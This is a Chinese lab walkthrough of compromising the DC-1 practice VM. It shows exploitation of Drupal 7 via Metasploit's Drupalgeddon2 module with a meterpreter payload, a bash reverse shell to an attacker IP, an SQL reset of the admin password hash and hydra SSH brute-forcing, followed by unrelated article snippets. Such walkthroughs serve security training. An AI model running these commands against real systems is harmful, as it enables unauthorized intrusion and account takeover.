网络安全之DC-1靶机渗透实验

2024-08-29 12:12

本文主要是介绍网络安全之DC-1靶机渗透实验,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、下载DC-1靶机虚拟机镜像文件,导入VM虚拟机

https://pan.baidu.com/s/1B1IbAgA8vD9-cZ_mdZy9wA?pwd=qwui

二、设置DC-1的网卡模式为NAT模式,记录其MAC地址
在这里插入图片描述
三、在kali系统中利用nmap工具扫描本网段主机信息

# nmap -sP 192.168.2.0/24 -oN nmap.sP

在这里插入图片描述
由图可知靶机获取到的地址是192.168.2.7
利用获取到的IP地址,进一步对其端口扫描

# nmap -A 192.168.2.7 -p 1-65535 -oN nmap.A

在这里插入图片描述
发现靶机开放22端口(可以爆破)和80端口,在80端口下,可以看到其网站的模板为:Drupal 7(国外三大PHP CMS之一,drual、wordpress、joomla)。

我们先访问一下靶机的80端口
在这里插入图片描述
接下来通过使用MSF直接搜索该网站模板存在的漏洞

启动msf
# msfconsole 

在这里插入图片描述

msf6 > search drupal

在这里插入图片描述通过查看References来查看该漏洞的详细信息

 https://cvedetails.com/cve/CVE-2018-7600/

在这里插入图片描述
选择攻击载荷

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2  选择模块
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp 设置攻击载荷

在这里插入图片描述
缺少目标地址

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.2.7

在这里插入图片描述

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

成功拿到shell
在这里插入图片描述
flag1
在这里插入图片描述
Every good CMS needs a config file - and so do you.这句话指引应该去找的该网站的配置文件所在目录:sites/default/

flag2
在这里插入图片描述

'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',     

接下来进入交互界面,进一步获取信息
在这里插入图片描述
根据获取到的信息尝试连接数据库

mysql -udbuser -pR0ck3t  #连接失败,考虑使用反弹shell

kali机本地监听2333端口
直接反弹失败
在这里插入图片描述
使用python反弹

meterpreter > shell
Process 3791 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ 

在这里插入图片描述

www-data@DC-1:/var/www$ bash -i >& /dev/tcp/192.168.2.10/2333 0>&1

反弹成功
在这里插入图片描述

进入数据库drupladb,查询users数据表

mysql> use drupaldb
mysql> select * from users\G

在这里插入图片描述
重置后台管理员admin用户密码,由于破解admin 用户密码要耗费一定时间,我这里考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin

在这里插入图片描述
更新users表

mysql> update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

在这里插入图片描述
更新成功,管理员admin的密码已经更改为admin

flag3
使用新密码登录后台
在这里插入图片描述
在这里插入图片描述
按照提示找到/etc/passwd

flag4
在这里插入图片描述
由图可知flag4用户可以登录
使用hydra进行爆破flag4用户密码,在kali系统中执行

# hydra -l flag4 -P /usr/share/john/password.lst 192.168.2.7 ssh -vV -f -o hydra.ssh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
检查一下是否有一些命令具有SUID 标志
在这里插入图片描述
利用操作系统内核提权
在这里插入图片描述
成功获取root权限
在这里插入图片描述

这篇关于网络安全之DC-1靶机渗透实验的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1117828

相关文章

如何做好网络安全

随着互联网技术的飞速发展,网站已成为企业对外展示、交流和服务的重要窗口。然而,随之而来的网站安全问题也日益凸显,给企业的业务发展和用户数据安全带来了巨大威胁。因此,高度重视网站安全已成为网络安全的首要任务。今天我们就来详细探讨网站安全的重要性、面临的挑战以及有什么应对方案。 一、网站安全的重要性 1. 数据安全与用户隐私 网站是企业存储和传输数据的关键平台,包括用户个人信息、

STM32(十一):ADC数模转换器实验

AD单通道: 1.RCC开启GPIO和ADC时钟。配置ADCCLK分频器。 2.配置GPIO,把GPIO配置成模拟输入的模式。 3.配置多路开关,把左面通道接入到右面规则组列表里。 4.配置ADC转换器, 包括AD转换器和AD数据寄存器。单次转换,连续转换;扫描、非扫描;有几个通道,触发源是什么,数据对齐是左对齐还是右对齐。 5.ADC_CMD 开启ADC。 void RCC_AD

HNU-2023电路与电子学-实验3

写在前面: 一、实验目的 1.了解简易模型机的内部结构和工作原理。 2.分析模型机的功能,设计 8 重 3-1 多路复用器。 3.分析模型机的功能,设计 8 重 2-1 多路复用器。 4.分析模型机的工作原理,设计模型机控制信号产生逻辑。 二、实验内容 1.用 VERILOG 语言设计模型机的 8 重 3-1 多路复用器; 2.用 VERILOG 语言设计模型机的 8 重 2-1 多

Keysight U8031A DC power supply

Keysight U8031A DC power supply 文章目录 Keysight U8031A DC power supply前言电容充电⽰意图一、恒定电压操作二、恒定电流操作三、5v操作四、跟踪模式操作五、存储器操作六、对过电压保护编程七、对过电流保护编程八、锁键操作 前言 U8031A Power Supply 是一款具备前面板编程能力的三路输出电源。通过使

网络安全运维培训一般多少钱

在当今数字化时代,网络安全已成为企业和个人关注的焦点。而网络安全运维作为保障网络安全的重要环节,其专业人才的需求也日益增长。许多人都对网络安全运维培训感兴趣,那么,网络安全运维培训一般多少钱呢?   一、影响网络安全运维培训价格的因素   1. 培训内容的深度和广度   不同的网络安全运维培训课程涵盖的内容有所不同。一些基础的培训课程可能主要涉及网络安全基础知识、常见安全工具的使用等,价

61.以太网数据回环实验(4)以太网数据收发器发送模块

(1)状态转移图: (2)IP数据包格式: (3)UDP数据包格式: (4)以太网发送模块代码: module udp_tx(input wire gmii_txc ,input wire reset_n ,input wire tx_start_en , //以太网开始发送信

【网络安全】服务基础第二阶段——第二节:Linux系统管理基础----Linux统计,高阶命令

目录 一、Linux高阶命令 1.1 管道符的基本原理 1.2 重定向 1.2.1 输出重定向 1.2.2 输入重定向 1.2.3 wc命令基本用法 1.3 别名 1.3.1 which命令基本语法 1.3.2 alias命令基本语法 1.4 压缩归档tar 1.4.1 第一种:gzip压缩 1.4.2 第二种:bzip压缩 1.5 tar命令 二、VIM编辑器使用

LTspice模拟CCM和DCM模式的BUCK电路实验及参数计算

关于BUCK电路的原理可以参考硬件工程师炼成之路写的《 手撕Buck!Buck公式推导过程》.实验内容是将12V~5V的Buck电路仿真,要求纹波电压小于15mv. CCM和DCM的区别: CCM:在一个开关周期内,电感电流从不会到0. DCM:在开关周期内,电感电流总会到0. CCM模式Buck电路仿真: 在用LTspice模拟CCM电路时,MOS管驱动信号频率为100Khz,负载为10R(可自

120张网络安全等保拓扑大全

安全意识培训不是一个ppt通吃,不同的场景应该用不同的培训方式和内容http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484385&idx=1&sn=92f5e7f3ee36bdb513379b833651711d&chksm=c0e47abdf793f3ab7f4621b64d29c04acc03b45c0fc1eb613c37f3

HCIA--实验十:路由的递归特性

递归路由的理解 一、实验内容 1.需求/要求: 使用4台路由器,在AR1和AR4上分别配置一个LOOPBACK接口,根据路由的递归特性,写一系列的静态路由实现让1.1.1.1和4.4.4.4的双向通信。 二、实验过程 1.拓扑图: 2.步骤: (下列命令行可以直接复制在ensp) 1.如拓扑图所示,配置各路由器的基本信息: 各接口的ip地址及子网掩码,给AR1和AR4分别配置